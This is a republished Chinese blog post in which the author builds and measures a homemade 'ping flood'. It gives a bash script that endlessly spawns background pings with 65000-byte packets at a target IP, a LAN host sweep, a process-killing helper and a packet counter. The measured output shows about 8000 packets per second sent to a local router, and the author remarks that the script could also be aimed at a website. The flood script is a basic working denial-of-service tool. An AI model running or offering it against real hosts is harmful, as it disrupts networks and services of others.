题目中“洪ping”带了“”,是因为我以前大一玩洪ping黑客软件没试成功过,也没有接触过这类软件的开发。
印象中洪ping有如下特征:原始的洪ping一次能发送大于65500字节的请求包 :短时间内能发送大量的数据包(本实验的“数据包“每秒达到8000个左右)
也就是说ping baidu.com -s 65000是合法的ping
于是写了这么一个脚本
myflood.sh
|
1
2
3
4
5
6
7
8
9
10
11
|
#!/bin/bash
function
floodping(){
while
true
do
(
ping
$toping -s 65000 &>
/dev/null
;)&
done
}
toping=$1;
floodping;
wait;
|
用法 $bash myflood.sh ip(192.168.1.2)
脚本原理:
while true 死循环
..... &> /dev/null 将前面产生的字符输入到/dev/null(黑洞)中;
()& 将()内的命令放在后台执行
wait等待子进程结束
脚本意图:不断产生 ping进程去发送数据包(在内存范围之内)
先以网内ip做测试
写了一个检测内网ip的脚本
networks.sh
|
1
2
3
4
5
6
7
|
#!/bin/bash
network=
"192.168.1"
for
sitenu
in
$(
seq
1 100)
do
(
ping
-c 1 -w 1 ${network}.${sitenu} &>
/dev/null
&&
echo
${network}.${sitenu} up ||
echo
${network}.${sitenu} down)&
done
wait
|
$ bash networks.sh | grep up
192.168.1.1 up
192.168.1.5 up
192.168.1.4 up
本次以192.168.1.1做实验
为内存不被消耗完,于是写了一个杀死ping线程的脚本killpings.sh
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
#!/bin/bash
function
killps(){
bbb=
"`pgrep $threadname`"
#变量跟-号不要加空格
[ -z
"$bbb"
] &&
echo
"$threadname is not running"
&&
exit
#加双引号,使空格无效
for
i
in
$bbb
do
kill
-9 $i
done
echo
"$threadname is kill"
}
threadname=
'ping'
;
while
true
do
sleep
1;
killps;
done
wait
|
这样myflood.sh一边产出ping子进程,一边killpings.sh杀死一部分进程;这样差不多布消耗内存(实验中只占用了200MB左右的内存)
实验结果的查看工具:
nload eth0查看流量。
ifconfig eth0 查看请求的数据包发送个数。利用这个原理写了一个检测数据包的脚本。(检测30秒,每秒一次)
packagebc.sh
|
1
2
3
4
5
6
7
8
9
10
11
12
|
#!/bin/bash
for
i
in
`
seq
1 30`;
do
firstgetvalue=$(
ifconfig
eth0 |
tail
-n 5 |
tr
-d -c
'0-9 '
|
tr
' '
'\n'
|
tr
-s
'\n'
|
sed
-n
'2,2p'
)
firstoutvalue=$(
ifconfig
eth0 |
tail
-n 5 |
tr
-d -c
'0-9 '
|
tr
' '
'\n'
|
tr
-s
'\n'
|
sed
-n
'7,7p'
)
sleep
1;
secondgetvalue=$(
ifconfig
eth0 |
tail
-n 5 |
tr
-d -c
'0-9 '
|
tr
' '
'\n'
|
tr
-s
'\n'
|
sed
-n
'2,2p'
)
secondoutvalue=$(
ifconfig
eth0 |
tail
-n 5 |
tr
-d -c
'0-9 '
|
tr
' '
'\n'
|
tr
-s
'\n'
|
sed
-n
'7,7p'
)
echo
"getvalue(s): "
$[ $secondgetvalue - $firstgetvalue]
echo
"outvalue(s): "
$[ $secondoutvalue - $firstoutvalue]
echo
-e
""
done
|
本次实验用到4个终端
查看效果的终端(两个):
一个运行nload eth0
一个运行bash packagebc.sh(这里监测数据包的,如要查看内存用free命令)
脚本运行终端(必须两个配合):
一个运行脚本bash killpings.sh(确保在运行下面的myflood.sh脚本时,本脚本在运行)
一个运行bash myflood.sh 192.168.1.1 (或bash myflood goo..g.com)
本实验采集的数据有:该实验的内存占用数据;每秒的流量变化;每秒发出的数据包
实验过程中结果
内存占用
实验前有3335596kb;实验时有内存占用约200MB(本次实验的占用内存是变化的:killpings.sh的作用)
流量占用
最重要的一个每秒“发送的请求包”数据变化(监测30秒内的数据)每秒能达到7500到8500左右。
getvalue(s): 0
outvalue(s): 8245
getvalue(s): 264
outvalue(s): 8348
getvalue(s): 176
outvalue(s): 8296
getvalue(s): 485
outvalue(s): 8028
getvalue(s): 277
outvalue(s): 8256
getvalue(s): 616
outvalue(s): 7984
getvalue(s): 132
outvalue(s): 8275
getvalue(s): 440
outvalue(s): 7965
getvalue(s): 132
outvalue(s): 8248
getvalue(s): 441
outvalue(s): 8009
getvalue(s): 265
outvalue(s): 8216
getvalue(s): 616
outvalue(s): 7486
getvalue(s): 221
outvalue(s): 8268
getvalue(s): 308
outvalue(s): 7446
getvalue(s): 178
outvalue(s): 8262
getvalue(s): 573
outvalue(s): 7664
getvalue(s): 308
outvalue(s): 8265
getvalue(s): 616
outvalue(s): 7788
getvalue(s): 221
outvalue(s): 8255
getvalue(s): 616
outvalue(s): 7810
getvalue(s): 247
outvalue(s): 8208
getvalue(s): 617
outvalue(s): 7576
getvalue(s): 177
outvalue(s): 8246
getvalue(s): 528
outvalue(s): 7493
getvalue(s): 176
outvalue(s): 8248
getvalue(s): 661
outvalue(s): 6856
getvalue(s): 221
outvalue(s): 8262
getvalue(s): 660
outvalue(s): 7528
getvalue(s): 396
outvalue(s): 8203
getvalue(s): 751
outvalue(s): 7746
这里就不以网站做实验,觉得原理应该一样的。
不清楚这算不算他们意义上的洪ping,感谢专业人士的评估
本文转自lilin9105 51CTO博客,原文链接:http://blog.51cto.com/7071976/1253225,如需转载请自行联系原作者
